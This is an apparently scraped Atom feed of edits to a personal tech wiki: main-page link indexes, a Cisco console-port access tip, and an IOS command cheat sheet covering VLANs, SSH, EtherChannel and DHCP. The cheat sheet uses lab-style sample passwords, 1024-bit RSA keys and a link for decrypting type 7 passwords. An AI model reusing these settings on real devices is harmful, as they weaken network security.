&lt;br /&gt;
Retro Tech: |&lt;br /&gt;
[[Analog Video Articles]] | [[Modeline Generators]] | [https://github.com/antonioginer/ATOM-15 ATOM-15: AMD/ATI Card 15khz bios] | [https://luigiblood.tumblr.com/post/711882982704726016/everything-datamined-about-gba-nso-so-far Deep Dive into Nintendo Switch NSO GBA Link Cable Emulation] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/Yakumono&#039;s%20Blog_%20Everything%20datamined%20about%20GB_A%20NSO%20so%20far..pdf (pdf)]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Digital Archives: |&lt;br /&gt;
[https://archive.org archive.org] | [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes kirb.feels archive] | [https://en.wikipedia.org/wiki/Library_Genesis Library Genesis] | [https://en.wikipedia.org/wiki/Anna&#039;s_Archive Anna&#039;s Archive]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Open Source Intelligence: | &lt;br /&gt;
[https://osintframework.com/ OsINT Framework] | [https://www.usphonebook.com/ USPhoneBook]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/YdGUYXws5mD2fxFKxg.webp ☕Happy Monday =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/giphy.webp ☕Bom Dia =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/tenor.gif ☕??????]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tech &amp;amp; Vulnerability News: | [https://lwn.net/ LWN.net] | [https://news.ycombinator.com/ Hacker News] | [https://www.jwz.org/blog/ JWZ&#039;s Blog] | [https://drewdevault.com/ Drew Devault&#039;s Blog]&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Console_Port_Access&amp;diff=1138</id>
		<title>Console Port Access</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Console_Port_Access&amp;diff=1138"/>
		<updated>2026-02-25T18:06:52Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: Created page with &amp;quot;This is the command you would use on linux to access a cisco device&amp;#039;s console port. This would usually be through a RS232 to USB adapter.   screen /dev/ttyUSB0 9600  Even though the console port on a cisco switch might be RJ45 like ethernet, its just RS232 serial with a different connector, hence why you need the adapter.   On Windows you would probably want to use something like PuTTY.&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This is the command you would use on linux to access a cisco device&#039;s console port. This would usually be through a RS232 to USB adapter. &lt;br /&gt;
 screen /dev/ttyUSB0 9600&lt;br /&gt;
&lt;br /&gt;
Even though the console port on a cisco switch might be RJ45 like ethernet, its just RS232 serial with a different connector, hence why you need the adapter. &lt;br /&gt;
&lt;br /&gt;
On Windows you would probably want to use something like PuTTY.&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1137</id>
		<title>Main Page</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1137"/>
		<updated>2026-02-25T18:00:50Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;strong&amp;gt;Welcome to Lucca&#039;s Knowledgebase&amp;lt;/strong&amp;gt;&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Windows: |&lt;br /&gt;
[[Commands]] | [[Win+R Shortcuts]] | [[Windows Keyboard Shortcuts]] | [[Remote Desktop Setup]] | [[End of Life]] | [[Make CMD Open Faster on Windows 11]] | [[Hyper-V on Windows Home]] | [[Domain Setup from Scratch on Server Core]] | [[Example User onboarding &amp;amp; offboarding Scripts for 365]] | [[Keyboard Navigation Scripts]] | [[Registry Tweaks/Fixes]] | [[TLS Setting in Internet Options]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Linux: | [[Distro Download Links]] | [[Linux Commands|Commands]] | [[Docker-Compose]] | [[Bashrc/Zshrc Setup]] | [https://arachnoid.com/SecureShell/index.html Arachnoid.com: How to use SSH] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/How%20to%20Use%20Secure%20Shell.pdf pdf] | [[Libvirt Setup]] | [[VFIO GPU Passthrough Setup]] | [[VFIO Anti-Cheat Bypass Tools]] | [[Xubuntu Mac Conversion Guide]] | [[Ungoogled Chromium Debian]] | [[Docker Installation on Debian]] | [[Infared Reciever w/ Alpine on the Bulldozer Datto]] | [[Numpad hotkeys on linux]] | [[Split a monitor in two]] | [[Make a udev rule]] | [[Type Unicode Characters]] | [[Screen Recording Options]] | [[Microsoft Authenticator]] | [https://www.debugpoint.com/kvm-share-folder-windows-guest/ Setup A Share Folder between a Linux host and Windows Guest] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/Share%20Folder%20Between%20Windows%20Guest%20and%20Linux%20Host%20in%20KVM%20using%20virtiofs.pdf pdf] | [[Perform actions based on notification content]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pentesting: | [https://www.exploit-db.com/ Exploit-DB] [[Performing a SYN flood attack]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MacOS: | [[OSX Commands]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Javascript: | [[VM Userscript to disable website right-click and copy-blocking]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Python: | [[Math Operators]] | [[Python Examples|Examples]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cisco: | [[Cisco Commands|Commands]] | [[Cisco Keyboard Shortcuts|Keyboard Shortcuts]] | [[Example configuration files]] | [[Ethernet: Straight-through VS Crossover Cable]] | [https://en.wikipedia.org/wiki/Path_MTU_Discovery Path MTU Discovery] | [[ipv6]] | [[802.1q]] (Vlan Tagging) | [[WAP Arrangement]] | [https://en.wikipedia.org/wiki/VLAN_hopping Wikipedia - Vlan Hopping] | [[Console Port Access]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Robotics: | [[Nao Robot]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Retro Tech: |&lt;br /&gt;
[[Analog Video Articles]] | [[Modeline Generators]] | [https://github.com/antonioginer/ATOM-15 ATOM-15: AMD/ATI Card 15khz bios] | [https://luigiblood.tumblr.com/post/711882982704726016/everything-datamined-about-gba-nso-so-far Deep Dive into Nintendo Switch NSO GBA Link Cable Emulation] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/Yakumono&#039;s%20Blog_%20Everything%20datamined%20about%20GB_A%20NSO%20so%20far..pdf pdf]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Digital Archives: |&lt;br /&gt;
[https://archive.org archive.org] | [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes kirb.feels archive] [https://en.wikipedia.org/wiki/Library_Genesis Library Genesis]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Open Source Intelligence: | &lt;br /&gt;
[https://osintframework.com/ OsINT Framework] | [https://www.usphonebook.com/ USPhoneBook]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/YdGUYXws5mD2fxFKxg.webp ☕Happy Monday =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/giphy.webp ☕Bom Dia =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/tenor.gif ☕??????]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1136</id>
		<title>Main Page</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1136"/>
		<updated>2026-02-25T18:00:24Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;strong&amp;gt;Welcome to Lucca&#039;s Knowledgebase&amp;lt;/strong&amp;gt;&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Windows: |&lt;br /&gt;
[[Commands]] | [[Win+R Shortcuts]] | [[Windows Keyboard Shortcuts]] | [[Remote Desktop Setup]] | [[End of Life]] | [[Make CMD Open Faster on Windows 11]] | [[Hyper-V on Windows Home]] | [[Domain Setup from Scratch on Server Core]] | [[Example User onboarding &amp;amp; offboarding Scripts for 365]] | [[Keyboard Navigation Scripts]] | [[Registry Tweaks/Fixes]] | [[TLS Setting in Internet Options]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Linux: | [[Distro Download Links]] | [[Linux Commands|Commands]] | [[Docker-Compose]] | [[Bashrc/Zshrc Setup]] | [https://arachnoid.com/SecureShell/index.html Arachnoid.com: How to use SSH] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/How%20to%20Use%20Secure%20Shell.pdf pdf] | [[Libvirt Setup]] | [[VFIO GPU Passthrough Setup]] | [[VFIO Anti-Cheat Bypass Tools]] | [[Xubuntu Mac Conversion Guide]] | [[Ungoogled Chromium Debian]] | [[Docker Installation on Debian]] | [[Infared Reciever w/ Alpine on the Bulldozer Datto]] | [[Numpad hotkeys on linux]] | [[Split a monitor in two]] | [[Make a udev rule]] | [[Type Unicode Characters]] | [[Screen Recording Options]] | [[Microsoft Authenticator]] | [https://www.debugpoint.com/kvm-share-folder-windows-guest/ Setup A Share Folder between a Linux host and Windows Guest] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/Share%20Folder%20Between%20Windows%20Guest%20and%20Linux%20Host%20in%20KVM%20using%20virtiofs.pdf pdf] | [[Perform actions based on notification content]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pentesting: | [https://www.exploit-db.com/ Exploit-DB] [[Performing a SYN flood attack]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MacOS: | [[OSX Commands]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Javascript: | [[VM Userscript to disable website right-click and copy-blocking]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Python: | [[Math Operators]] | [[Python Examples|Examples]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cisco: | [[Cisco Commands|Commands]] | [[Cisco Keyboard Shortcuts|Keyboard Shortcuts]] | [[Example configuration files]] | [[Ethernet: Straight-through VS Crossover Cable]] | [https://en.wikipedia.org/wiki/Path_MTU_Discovery Path MTU Discovery] | [[ipv6]] | [[802.1q]] (Vlan Tagging) | [[WAP Arrangement]] | [https://en.wikipedia.org/wiki/VLAN_hopping Wikipedia - Vlan Hopping] | [[Accessing a real cisco device over the console port]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Robotics: | [[Nao Robot]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Retro Tech: |&lt;br /&gt;
[[Analog Video Articles]] | [[Modeline Generators]] | [https://github.com/antonioginer/ATOM-15 ATOM-15: AMD/ATI Card 15khz bios] | [https://luigiblood.tumblr.com/post/711882982704726016/everything-datamined-about-gba-nso-so-far Deep Dive into Nintendo Switch NSO GBA Link Cable Emulation] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/Yakumono&#039;s%20Blog_%20Everything%20datamined%20about%20GB_A%20NSO%20so%20far..pdf pdf]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Digital Archives: |&lt;br /&gt;
[https://archive.org archive.org] | [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes kirb.feels archive] [https://en.wikipedia.org/wiki/Library_Genesis Library Genesis]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Open Source Intelligence: | &lt;br /&gt;
[https://osintframework.com/ OsINT Framework] | [https://www.usphonebook.com/ USPhoneBook]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/YdGUYXws5mD2fxFKxg.webp ☕Happy Monday =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/giphy.webp ☕Bom Dia =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/tenor.gif ☕??????]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1132</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1132"/>
		<updated>2026-02-24T19:55:27Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* SSH Configuration */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | exclude {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode (&amp;quot;elevate to root&amp;quot;) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generate RSA Keys (1-liner) ===&lt;br /&gt;
 crypto key generate rsa general-keys modulus 1024&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway (switch) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
 interface vlan 1&lt;br /&gt;
 interface fa0/1&lt;br /&gt;
 interface range fa0/2-3&lt;br /&gt;
 interface range fa0/2-3,g0/1&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
 no shutdown&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
 ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Default Gateway (Switch) ===&lt;br /&gt;
 ip default-gateway 192.168.0.254&lt;br /&gt;
&lt;br /&gt;
== Interface IPv6 Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
Set the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages. &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.&lt;br /&gt;
&lt;br /&gt;
 ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Access / Trunk Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
Configures the interface as an access port and assigns it to VLAN 10.&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
Configures the interface as a trunk port using 802.1Q encapsulation.&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Trunk Allowed VLANs ===&lt;br /&gt;
Specifies which VLANs are allowed to traverse the trunk link.&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Native VLANs ===&lt;br /&gt;
Sets the native VLAN for untagged traffic on the trunk.&lt;br /&gt;
 switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Nonegotiate ===&lt;br /&gt;
Disables DTP (Dynamic Trunking Protocol) negotiation on the trunk interface.&lt;br /&gt;
 switchport nonegotiate&lt;br /&gt;
&lt;br /&gt;
== EtherChannel Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Active) ===&lt;br /&gt;
Configures interfaces to actively negotiate EtherChannel using LACP.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Passive) ===&lt;br /&gt;
Configures interfaces to respond to LACP negotiation.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode passive&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (On Mode) ===&lt;br /&gt;
Forces EtherChannel without negotiation protocol.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode on&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Access Port ===&lt;br /&gt;
Applies access configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport mode access&lt;br /&gt;
  switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Trunk ===&lt;br /&gt;
Applies trunk configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify EtherChannel ===&lt;br /&gt;
Displays EtherChannel status and summary information.&lt;br /&gt;
 show etherchannel summary&lt;br /&gt;
&lt;br /&gt;
=== Verify Port-Channel Interface ===&lt;br /&gt;
Displays detailed information about the Port-Channel interface.&lt;br /&gt;
 show interfaces port-channel 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== DHCP ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a DHCP Server on a Cisco Router ===&lt;br /&gt;
Assigns IP addresses automatically to clients on a network.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 192.168.1.1 192.168.1.10&lt;br /&gt;
! Exclude addresses that should not be assigned dynamically&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool LAN_POOL&lt;br /&gt;
 network 192.168.1.0 255.255.255.0&lt;br /&gt;
 default-router 192.168.1.1&lt;br /&gt;
 dns-server 8.8.8.8 8.8.4.4&lt;br /&gt;
 lease 7&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
